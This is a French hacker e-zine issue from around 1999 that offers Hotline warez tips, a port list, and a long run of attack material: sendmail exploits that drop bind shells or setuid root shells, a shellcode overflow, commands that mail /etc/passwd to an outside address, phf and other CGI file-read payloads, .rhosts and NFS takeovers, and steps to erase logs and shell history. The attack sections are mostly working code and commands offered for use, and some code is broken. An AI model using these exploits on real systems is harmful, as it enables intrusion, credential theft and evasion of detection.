***   ***  *****    ***  ******     *******  ******    **  **  ******  *******  **  **
***   ***  *** **   ***  **   **    **       **   **   **  **  **  **  **       ** **
***   ***  *** ***  ***  **   ***   **       **   ***  **  **  **  **  **       ****
***   ***  *** **** ***  **   ****  ****     *******   ******  ******  **       ***
***   ***  *** **** ***  **   ***   **       ******    ******  ******  **       ****
 **   **   ***  *** ***  **   **    **       **   **   **  **  **  **  **       ** **
  *****    ***   ******  ******     *******  **   ***  **  **  **  **  *******  **  **
          
                                                                                BY WEBHACK



Webhack : http://webhack2000.cjb.net         webhack@ifrance.com
Mailling liste : webhack@onelist.com

Les membres : 

Solid snake : solid-snake@ifrance.com     :  WEBMASTER ET RESPONSABLE :o)
juda13      : juda13@ifrance.com          :  MP3 ET PROGRAMMES
tristan K   : TristanK@ifrance.com        :  REDACTEUR POUR LE ZINE
aideware    : aideware@ifrance.com        :  HACKING SUR MACINTOSH ET XStar
blackhawk   : blackawk@ifrance.com        :  CRACKING
Deedjee     : deedjee@ifrance.com         :  PHREAKING, ARNAQUE ET ELECTRONIQUE

----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

                                   DISCLAIMER

Avant que vous continuiez je tiens a préciser un certain nombre de choses : 
Le piratage informatique ce n'est pas bien. Mais surtout c'est illégal. 
Les infomations fournis sur le zine UNDERHACK sont purement à titre informatif et culturel 
(si, si je vous assure!). NOUS DECLINONS TOUTE RESPONSABILITE quant à l'utilisation que vous en ferez.
Le simple fait que cette page s'affiche sur votre écran implique que vous acceptez sans aucune réserve 
les termes décrits précédemment, sinon allez voir ailleurs si j'y suis. 
(Et d'ailleurs ptêt que j'y suis quand même)

PS : Si vous faites partie du FBI , DST , ou tout autres association du meme genre , vous n'etes
pas invité a lire cet e-zine qui est d'ailleur interdit a la lecture , donc vous devez etre de Jupiter
(je me suis renseigner c legal la bas !) si vous n'etes pas de jupiter , NE LISEZ PAS CE ZINE !

         A VOS RIQUES ET PERILS et souvenez vous : ILS SONT PARTOUT ! 

PS : pour lire ce zine , allez dans affichage ou edition et : retour a la ligne automatique :o)
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------


/////////////////////////////////SOMMAIRE\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///  1 . UTILISER HOTLINE 1.5 SUR MACINTOSH                \\\\\\ aideware   \\\\\\\
///  2 . COMMENT ENVOYER SES MAIL SANS LA PUB DANS IFRANCE \\\\\\ DOCKY99    \\\\\\\
///  3 . COMMEN TROUVER LES FAILLES D'UN SYSTEME           \\\\\\ Putois     \\\\\\\
///  4 . SENDMAIL EXPLOIT                                  \\\\\\ Putois     \\\\\\\
///  5 . ENREGISTRER SON CHANNEL SUR DALNET                \\\\\\ Putois     \\\\\\\
///  6 . LES BUG HTTPD/CGI-BIN                             \\\\\\ Putois     \\\\\\\
///  7 . EFFACER LES LOGS                                  \\\\\\ Putois     \\\\\\\
///  8 . SCRIPT ET WINDOWS NT                              \\\\\\ Putois     \\\\\\\
///  9 . CHANGER SON NOM DE DOMAINE ET AUTRES...           \\\\\\ Putois     \\\\\\\
/// 10 . COPIER DES VIDEOS PROTEGEES                       \\\\\\ Deedjee    \\\\\\\
/// 11 . ANARCHIE, BOMBE ET AUTRES....                     \\\\\\ Deedjee    \\\\\\\
/// 12 . BEIGE BOXING                                      \\\\\\ Deedjee    \\\\\\\
/// 13 . BLACK BOX                                         \\\\\\ Deedjee    \\\\\\\
/// 14 . ECOUTE TELEPHONIQUE                               \\\\\\ Deedjee    \\\\\\\
/// 15 . VIRII FACILES                                     \\\\\\ Deedjee    \\\\\\\
//////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
///                                GREETZ                                    \\\\\\\
///////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\   


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------


                                EDITO N°2 By Solid Snake

Vala ! le numero 2 ! qui n'en est que meilleur je vous l'avais dit :o) Vous avez surement remarqué que la structure du groupe a changee , des nouveaux, des membres en moins...
C parceque le groupe bouge tout le temps , alors si vous aussi vous voulez entrer dans le groupe : webhack@ifrance.com , vos motivations et de quoi voulez vous vous occuper !
Sinon je tenais a dire qu'on a une nouvelle personne pour les articles : putois , deja connu de certains...et qu'est ce qu'il ecrit ! TANT MIEUX POUR VOUS !
Vala c tous...


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
************************1. Comment utiliser Hotline 1.5 Sur macintosh...*************************
*************************************************************************************************

Salut a tous, je vais vous expliquer comment se servir de hotline, un des programmes 
indispensables pour toute recherche de logiciels, jeux, prog de hack, mp3...
Telechargez tout d'abord HL client : http://www.hotlineSW.com

1) Presentation de Hotline client :

		Hotline permet a tous de se connecter a different serveur creer par des 
                particuliers... Ainsi, vous aurez acces a une partie du disque dur de 
                la personne ayant ouvert son ordinateur grace a "hotline server". 
                Il y aura differentes possibilites pour avoir la totalite des programmes. 
                Soit (la plus rependus) il vous faudra aller sur le net pour cliquer sur 
                different banner et trouver le login et mot de pass... Ainsi, le particulier 
                du serveur pourra gagner quelques dollars grace aux pub... La deuxieme 
                possibilite et d'uploader, soit dans les request, ou une liste de logiciel ou 
                mp3 est affichee, ou tout simplement un programme qu'il n'a pas... La derniere 
                possibilite, de moins en moins rependu et le telechargement libre, sans rien en 
                contrepartis...

2) Trackers... quoi donc que c'est ?

		Les trackers affiches la liste de serveur connectes, avec une breve description 
                pour chacun d'entre eux... Trouver un bon tracker avec un grand nombre de server 
                est obligatoir pour avoir le choix... Je pourrais vous conseiller :   
                canada.hltracker.com (209.240.36.244) qui se consacre aux wazer, hack, mp3....
                Pour vous y connecter, tout d'abord, appuyer sur le bouton "server" dans la 
                fenetre hotline connect (ou il y a un banner) Puis sur le bouton 
                "Edit Tracker list" et enfin "Add Tracker" ou vous pourrez entrer les donnees... 
                Une fois cela fais... cochez le nouveau tracker et cliquez sur le bouton "refresh" 
                dans la fenetre server.
                Ainsi, devand vos yeux ebahis, apparetra la fameuse liste...

3) Et maintenant... je fais quoi pour enfin telecharger ?

		Tout d'abord selectionnez entres tous les serveur celui qui vous conviens le 
                mieux, un champ permettant d'inscrire des mots cles pour une meilleur recherche 
                est disponible... Comme je l'ai dis un peu plus haut, un login avec son mot de 
                pass et souvent requit, commencez donc par un double clic sur un serveur, la, un 
                disclamer devrai apparaitre pendant la courte connection, c'est parfois ici que 
                vous verrez si il faut un mot de pass ou uploader... Cliquez ensuite sur le 
                bouton "files" pour reperer ce qu'il y a d'interessant. Enfin, regarder les 
                "news" ou normalement, tout vous sera explique avec detail pour les downs...

4) Toutes les fonctionnalites de Hotline client :

                Hotline Connect : Vous y trouverez tout d'abord un banner de pub, qui est parfois
                                  special pour le serveur, et tous les boutons qui pourront vous 
                                  servir dans l'exploration. 
                                  
                                  -Option: Vous pourrez selectionner votre nick qui servira 
                                   surtout pour les chats ou lors d'un login / pass personnel...
                                   Ainsi que toutes les preferences comme le petit icon qui vous 
                                   represante ou si vous auriez besoin d'un Socks Firewall.

				  -Connect: Pour vous connecter a un server grace a son adresse 
                                   IP... C'est ici que vous pourrez inscrire les log/pass... 
                                   Fenetre que vous pourrez faire apparaitre directement avec 
                                   l'adresse IP deja mise en faisant : alt+double click sur le 
                                   serveur... Il vous est possible de garder en memoire les 
                                   adresses avec les pass.

			          -Servers: Pour faire apparaitre la fenetre avec la liste de 
                                   serveur du trackers selectionnes.

				  -Users: Pour faire apparaitre la fenetre avec la liste de 
                                   toutes les personnes connectes sur le serveur. 

				  -Chat: Pour faire apparaitre la fenetre chat... Peu utilise sur 
                                   les sites de warez...

				  -News: Ou vous verrez la description du site, comment obtenir 
                                   le log/pass et des messages d'users.

				  -Files: Tous les fichiers telechargeables repertories.

			          -Task: Detail du telechargement en cours.


Vous voila donc pres pour utiliser ce superbe outil qu'est Hotline.

					Aideware@ifrance.com


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------


*************************************************************************************************
**********************2. COMMENT ENVOYER SES MAIL SANS LA PUB DANS IFRANCE***********************
****************************(et mailler gratuit en utilisant le stmp)****************************
*************************************************************************************************

Putain chais pas si sa vous est jamais arrivé de voir sa dans vos Email

______________________________________________________________________
Message envoye depuis iFrance >>  http://www.ifrance.com
Gratuit >> Hebergement (50 Mo)/Vos emails (POP&HTML)/Vos P.A.
NOUVEAU : vos encheres On-line : http://ifrance.aucland.fr

Ou similaire ... Sa vous emmerde pas ....moi si! (NDLR: Sa m'empêche pas de
regarder culture pub :D )

Il y a une méthode simple toute conne a la porté de tous
Lorque que vous créé un compte Email chez ifrance il vous donne comme
stmp celui d'ifrance.com qui est stmp.i-france.com dont celui ci se connard
Vous ajoutte une P.... de pub qui fait chier tous le monde et puis quand c
en englais
sa me crispe encore plus

Alors il faut simplement changer son stmp par un autre : lequelle et bien
cela depend de votre
connextion .
Example si t'es sur worldonline tu met stmp.worldonline.fr si t'es sur
wanadoo tu
met stmp.wanadoo.fr et si t'es sur AOL t'es dans la merde..) (NDLR:j'aime
pas aol)

Bon l'astuce du petit . pour dire que votre lettre est fini : sa marche pas
avec ifrance sa pub passe quand meme.....

Et voila + de pub dans vos lettre sa fait + clean nan ?

DOCKY99            Docky99@iFrance.com
Le Portail 'h/c/p' http://leportail.cjb.net/ et sans pub :)
ICQ  ( UIN )       15540100


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
*************3. Quest ce que fait un hacker pour trouver des failles sur un systeme**************
*************************************************************************************************

Avant tout il y a un minimum de chose a connaitre,genre comment fonctionne un reseau
sur internet.

Fonctionnement d'un reseau sur le web:
--------------------------------------

Pour bien explique le fonctionnement d'un reseau,chaque service est numerote par un Numero
que l'on appel "UN PORT".Nombreux soient ils les logiciels qui permmettent le scan de ports
sur le web , entre autre un des plus celebre pour windows : PORTSCAN ecris en visual basic 3
ou encore IPPROBER qui est mieux que portscan mais aussi  plus lent.

Un port est donc un numero qui est ratache a un service precis,exemple pour qu'un utilisateur
puisse surfer sur le web,c'est le port 80  (8080) qui s'en charge.Prenez par exemple Microsoft
Frontpage pour avoir votre port 80 ouvert,server u pour le ftp (21), irclpus pour un port irc
6667 etc ...

Ensuite une fois que l'on a lister les ports d'un serveur on va chercherce que l'on appel un 
"EXPLOIT" (bug) qui va nous permettre de recuperer le fichier password du site.On les trouves
sur des grand classic tel que BUGTRAQ ou www.rootshell.com.

En voici une petite liste de port avec le nom du service:

Numero de port:                     Fonction:
---------------                     ---------
                             
                            0             ICMP    
                            1             ICMP         
    				    2             IGMP         
   				    3             GGP         
    				    4             IP           
    				    5             ST           
    				    6             TCP         
				    7			ECHO
                            8			Unknow
                            9			DISCARD
                           10			BBN-RCC-MON 
                           11			Network Voice Protocol         
                           12			PUP
                           13			DATE
				   14			EMCON
				   15             Cross Net Debugger            
				   16			CHAOS  
				   17             UDP User Datagram                  
                           19			UDP , character generator
                           20			HMP   
				   21			FTP
                           22			SSH
                           23			TELNET 
				   24			TRUNK-2       
                           25			SENDMAIL (smtp)
                           53			Domaine Name Server   
                           70			GOPHER 
                           79			FINGER
                           80			WEB
                           81			Host name 2
                          110			POP3
                          111			RPCBIND
                          118			SQLSERV
                          119			NNTP (Network News Transfer Protocol)
                          436			DNA-cml
                          513			Remote Login (telnet)
                          514			CMD SHELL
                          515			Printer/spooler
                          611             NPMP-gui
                         1080			Blackjack network                          
            		 		Les trojans
                                    -----------

                         1234             subseven
				 5000             Socket de troie
				12346             netbus
                        20034             Master Paradise
		            31337             Back Orifice

Port 0
------
Il permet de s'envoyer un xterm avec les failles du sendmail.
Methode:  mail from:"|xterm -display 255.255.255.255:0 & ",et vous obtenez un shell.

Port 7
------
l'echo :),celui la quand on ferme le port les utilisateurs ont un disconnect,source de l'exploit
parrue dans noroute:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>



int Make_Connection(int port,const char *buf);
int Connect_To(int port,const char *buf)
{
	if (Make_Connection(port,buf)==-1) {
	printf ("%s's port number %i is now unreachable! \n",buf,port);
	return(0);
	}
	return(1);
}

main(int argc,char *argv[]) {
if (argv[1]&&argv[2]) {
	printf ("\nNow closing port %i on %s\n",atoi(argv[1]),argv[2]);
	while(Connect_To(atoi(argv[1]),argv[2]));
	printf("\n\nThanx to this lame kode, yeepee! =)\n");
	} else {
	printf("\n\nUsage: %s [port] [host]\n",argv[0]);
	}
}

int Make_Connection(int port,const char *buf)
{
	struct sockaddr_in myaddress;
	struct hostent *host;
	int v;
	host=gethostbyname(buf);
	if(host==NULL)
	{
	        return(-1);
	}
	myaddress.sin_family=host->h_addrtype;
	myaddress.sin_addr.s_addr=*((long *)host->h_addr);
	myaddress.sin_port=htons(port);       
	v=socket(AF_INET,SOCK_STREAM,0);
/* Ouverture du socket apres initialisation des donnees pour la connection */
	if(v==-1)
	{
		return(-1);
	}
	if(connect(v,(struct sockaddr *)&myaddress,sizeof(myaddress))<0)
/* Connection a la machine */
	{
		close(v);
		return(-1);
	}
	return(v);
}

** a compiler avec CC

Port 11
-------
>Telnet toto.com:11
ben ca donne des choses interessante,genre nom des machines,adresses routeur,users etc
             
Port 21
-------
Pas vraiment de bugs en ftp a part que l'on peut ecrire parfois dans les /pub,il existe des
technique comme "bounce attack,ou encore des soft permettant de trouver un pass a l'aide de
wordlist,mais c'est long et sa marche pas a tous les coups.

Les outdial
-----------

toto.com:21 , voila un mot bien oublie de la scene les port 21 etant ferme now,
un ex:dialout1.princeton.edu:21


Hack via sendmail   (port 25)
-----------------

La technique du FAKME MAIL port 25
----------------------------------
c'est l'art de s'envoyer des emails par le port 25 d'un serveur.
Usage:

c:\Telnet www.toto.com port 25
helo blah.net
mail from:user@blah.net
rcpt to:president@whitehouse.gov
data
.


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
**************************************4. SENDMAIL EXPLOITS***************************************
*************************************************************************************************


C'etais parrue dans Noroute avec l'article de code4 sur " Intrusion",la toute premiere fois 
ou j'ai appercu le bug du sendmail.L'inconvenient de l'article c'est qu'il ne dis pas sur 
quel version de sendmail il tourne.En voi‡i quelques un de ces bugs:

Sendmail 4.1
------------

shell>telnet www.host.com 25
#!/bin/sh

port=$3
user=$2
cmd=$4

if [ -z "$2" ]; then
   user=daemon
fi

if [ -z "$3" ]; then
   port=7002
fi

if [ -z "$4" ]; then
   cmd="/bin/csh -i"
fi

(
sleep 4
echo "helo"
echo "mail from: |"
echo "rcpt to: bounce"
echo "data"
echo "."
sleep 3
echo "mail from: $user"
echo "rcpt to: | sed '1,/^$/d' | sh"
echo "data"
echo "cat > /tmp/a.c <<EOF"
cat <<  EOF
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
goto loop;}                                          
EOF
echo "EOF"
echo "cd /tmp"
echo "/bin/cc /tmp/a.c"
echo "/bin/rm a.c"
echo "/tmp/a.out $port $cmd"
echo "."
echo "quit"
) | mconnect $1

Un autre exploit pour la version 4.1 qui marche avec le port 7008 au lieu de 25:

helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data
cat > /tmp/a.c <<EOF
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
goto loop;}                                          
EOF
cd /tmp
/bin/cc /tmp/a.c
/bin/rm a.c
/tmp/a.out 7008 /bin/sh
.
quit


Sendmail version 5.x
--------------------

shell> telnet target.com 25 << EOSM
 rcpt to: /home/students/twit/.rhosts
 mail from: twit
 data
 .
 rcpt to: /home/students/twit/.rhosts
 mail from: twit
 data
 myhost.com
 .
 quit
 EOSM

/bin/sh sendmail_haq
 Trying XXXXXXX
 Connected to target.com
 Escape character is '^]'.
 Connection closed by foreign host.

shell> rlogin target.com -l twit


Sendmail version 5.5
--------------------
shell> Telnet www.host.com 25 
Connected to host.com
 Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 8 Aug 99 18:04

Bon voila pour le message de bienvenue.Pour la suite tapez ca:

mail from: "|/bin/mail you@yourname.com < /etc/passwd"
250 "|/bin/mail you@yourname.com < /etc/passwd"... Sender ok
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.

Sendmail 5.6.1
--------------
#include <sys/param.h>
#include <sys/types.h>
#include <stdio.h>
#include <sysexits.h>
#include <pwd.h>
#include <grp.h>

#define OURFILE    "/tmp/x"

main()
int myuid, rval;
if ((myuid = getuid()) == MYUID)
rval = EX_TEMPFAIL;
else {
rval = EX_OK;
system(OURFILE);
}
exit(rval);
}

Sendmail 5.6.5
--------------

Shell>telnet www.toto.com 25
Escape character is '^]'.
220 toto.com 5.65 Sendmail is ready at Mon, 
HELO
250 Hello toto.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
.
Sendmail 8.6.4   
--------------




Sendmail 8.6.9
--------------

#include &#60sys/types.h>
#include &#60unistd.h>
#include &#60stdlib.h>

main(argc, argv)
int argc;
char **argv;
{
        execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
        "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, 
P=/bin/sh, F=lsDFMeu,
A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 
/tmp/newsh\">\n$rascii ",
        argv[1] ? argv[1] : "atreus",0);
}

usage: smh [ username [/path/to/sendmail]]


Sendmail 8.6.10
---------------
* gcc ident.c -o ident

#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define TIMEOUT 120
/* PROCINFO_BUFFER_SIZE must be bigger than 80 */
#define OUTPUT_BUFFER_SIZE 2048
#define SOCKET_BUFFER_SIZE 100
unsigned short lport = 0, rport = 0;
void
main ()
{
    unsigned long here, there
    struct fd_set fdset;
    struct timeval timeout;
    char buffer[OUTPUT_BUFFER_SIZE];
    char inbuffer[SOCKET_BUFFER_SIZE];
    int len;
    int fd;
    FD_ZERO (&fdset);
    FD_SET (0, &fdset);
    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;  
    select (1, &fdset, NULL, NULL, &timeout);
    len = read (0, inbuffer , SOCKET_BUFFER_SIZE - 1 );
    if (len <= 0
    exit (0);
    FD_SET (0, &fdset);
    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
    "Croot\t\t\t\t\t\t\tMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\t
    Mlocal,
    P=/bin/sh, F=lsDFMeu, A=sh -c $u\t\t\t\t\t\tR<\"|/bin/echo toor::0:1:toor:/:/bin/csh >> /etc/passwd\">\t\t\tR<\"|/usr/bin/chmod 4755 /usr/bin/time\">\r\n
    $rascii done");
    write (1, buffer, strlen (buffer));
    exit (0);
}

Sendmail 8.6.12
---------------

#include <stdio.h>
main()
{
void make_files();
     make_files();
     system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
}

void make_files()
 {
  int i,j;
  FILE *f;
  char nop_string[200];
  char code_string[]=
                      {
                         "\xeb\x50"                         /* jmp    cont */

/* geteip: */            "\x5d"                             /* popl   %ebp */
                         "\x55"                             /* pushl  %ebp */
                         "\xff\x8d\xc3\xff\xff\xff"         /* decl   0xffffffc3(%ebp) */
                         "\xff\x8d\xd7\xff\xff\xff"         /* decl   0xffffffd7(%ebp) */
                         "\xc3"                             /* ret */

/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
/* 0xffffffc3(%ebp): */ "\x3c"
                        "chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
                        "-leshka-leshka-leshka-leshka-"    /* reserved */

/* cont:  */            "\xc7\xc4\x70\xcf\xbf\xef"         /* movl   $0xefbfcf70,%esp */
                        "\xe8\xa5\xff\xff\xff"             /* call   geteip */
                        "\x81\xc5\xb4\xff\xff\xff"         /* addl   $0xb4ffffff,%ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x55"                             /* pushl  %ebp */
                        "\x68\xd0\x77\x04\x08"             /* pushl  $0x80477d0  */
                        "\xc3"                             /* ret */
                        "-leshka-leshka-leshka-leshka-"    /* reserved */
                        "\xa0\xcf\xbf\xef"
                     };

  j=269-sizeof(code_string);
  for(i=0;i<j;nop_string[i++]='\x90');
  nop_string[j]='\0';

  f=fopen("user.inf","w");
  fprintf(f,"#Changing user database information for leshka\n");
  fprintf(f,"Shell: /usr/local/bin/bash\n");
  fprintf(f,"Location: \n");
  fprintf(f,"Office Phone: \n");
  fprintf(f,"Home Phone: \n");
  fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
  fclose(f);

  f=fopen("hack","w");
  fprintf(f,"cat user.inf>\"$1\"\n");
  fprintf(f,"touch -t 2510711313 \"$1\"\n");
  fclose(f);
 }

Sendmail 8.7.8
--------------

echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"
|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh



S'envoyer des fichiers en C
---------------------------
All mails, c'est le nom du programme que je voulais lui donner,mais j'ai jamais eu le temps 
de le terminer au complet.

cc -o mail.c mail
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
{ 
  email()
}
void mailto()
{
 char root[]="localhost.localdomain";
 char *foo;
 foo=(char *)  malloc (4096);
 sprintf(foo, "mail %</etc/passwd",root);
 system(foo)
}

Et voila un 'tit client smtp :)  

Port 139 - Nuke,flood
---------------------
Nuke: permet de faire decoller un user (assez vieux)
Flood: effet d'envoyer des ping afin d'obtenier un disconnect


Port 673-721
------------ 
100004      2    tcp   673  ypserv
100005      1    udp   721  mountd

Faille du nis, permet de recuper un fichier passwd en connaissant seulement que le nom du
domaine.

En fesant:  rpcinfo -p www.victim.com
	      ypwhich -d victim  www.victim.com
            ypx -d name.victim.com victim -m passwd.byname

* fonctionne que quand nis est installer sur votre machine ;)


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
******************************5. ENREGISTRER SON CHANNEL SUR DALNET******************************
*************************************************************************************************


Toi aussi deviens un pro de l'irc! (port 6xxx)

Enregistrer Un channel sur dalnet:
1] Il faut d'abord enregistrer son nick name avec la commande suivante:
/nick server register toto   (-> toto etant le password de ton nick name

2] Se placer sur le channel que l'on veut creer avec la commande /join #channel

3] Enregistrer le nom du channel:
  /chanserv register #fredo bibi hack

Notes: la on a donc enregistrer un channel qui s'appel fredo qui a le password bibi et comme
description hack 
4] Garder le meme topic quan on est pas la    
  /chanserv  set #toto keeptopic on       -> la toto est le nom du channel :)

5] Ajouter un user:
 /chanserv aop #channel add    nickname    (-> nickname =p pseudo...)

6] Et bien sur pour utiliser le password de son nick name =)
 /msg nickserv identify password

7] Toi aussi devient ircop 
La il vous vous un systeme de type unix et une connecte 24h/24,et d'aller sur la page web du
server choisi puis remplir un formulaire online, ou un server viendra regarder le votre et
l'attacher au central.


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
************************************6. LES BUG HTTPD/CGI-BIN*************************************
*************************************************************************************************


Les bugs HTTPD:
-------------
Ce sont tous les bug des CGI que l'on trouve dans le repertoire host.com/cgi-bin
On a eu le plus connu le PHF :) www.toto.com/cgi-bin/phf,cette commande qui permettait
d'ouvrir n'importe quel fichier en remote.Liste des bugs permettant d'ouvrir un fichier:

www.toto.com/cgi-bin/phf?Qname=%0acat%20/etc/passwd 
www.toto.com/cgi-bin/phf?Qname=%0acd%20/%0als

www.toto.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
www.toto.com/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20/etc/passwd\n";*/

Rlogin + phf
------------
echo "+  +">/tmp/rhosts
echo "get /cgi-bin/phf?Qalias=x%0arcpttoto@yahoo.com:/tmp/rhosts+/root/.rhosts|nc -V -20 toto.com 80
rlogin -l root toto.com

php.cgi
-------
www.host.com/cgi-bin/php.cgi?/etc/passwd

htmlscript
----------
www.host.com/cgi-bin/htmlscript?/etc/passwd

faxsurvey
---------
www.toto.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

test-cgi  (netscape3)
--------
www.toto.com/cgi-bin/test-cgi/*

nfs
---
showmount --all toto.com
mount -a web.com:/etc

* Pour le cas d'un /home exportable
shell>mount -nt toto.com:/home /hack
shell>ls -sa1
shell>id
shell>who ami
shell>echo "user::102:2::/hack:/bin/csh">>/etc/passwd
shell>su -user
shell>ls -lsa /hack
shell>echo "+  +"> user/.rhost
shell>cd /
shell>rlogin toto.com

info2www
--------
GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'

whois_raw.cgi
-------------
/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd

view-source
-----------
/cgi-bin/view-source?/etc/passwd


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
**************************************7. EFFACER LES LOGS****************************************
*************************************************************************************************


C'est une des chose que l'on oublie souvent avant de partir d'un serveur.Voila quelques
commande pour effacer les logs:

rien laisser dans les /home et /tmp, effacer les logs httpd dans /Etc/httpd/acces.logs,
lister les elements modifier avant de se deconnecter :
ls -altr

Effacer les donnees historique:
mv .logout save.1
echo rm .history>.logout
echo rm .logout>>.logout
echo mv save1.1 .logout>>.logout

les fichier modifier apres la connection:
touche /tmp/chek
find / -never/tmpchek -print
find / -ctime 0 -print
find / -cmin 0 -print

Prog de secu.. 
crontab -l root

find / -user root -perm -4000 -print
ncheck -s /dev/rsd0g
ces commandes recherchent tous les fichiers ou il y a un suid root :)


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
************************************8. SCRIPT ET WINDOWS NT**************************************
*************************************************************************************************

La encore pas beaucoup de commentaire il s'agit des repertoire /script,mais le principe et rare
est aussi vieux que phf,le meilleur bug que l'on trouve pour nt reste celui de IPC$.

http://www.example.org/scripts/uploadn.asp
http://your.machine.name/scripts/rb.dll?
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/S
http://vulnerable.site.com/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB&attr=
http://servername/scripts/samples/search/webhits.exe
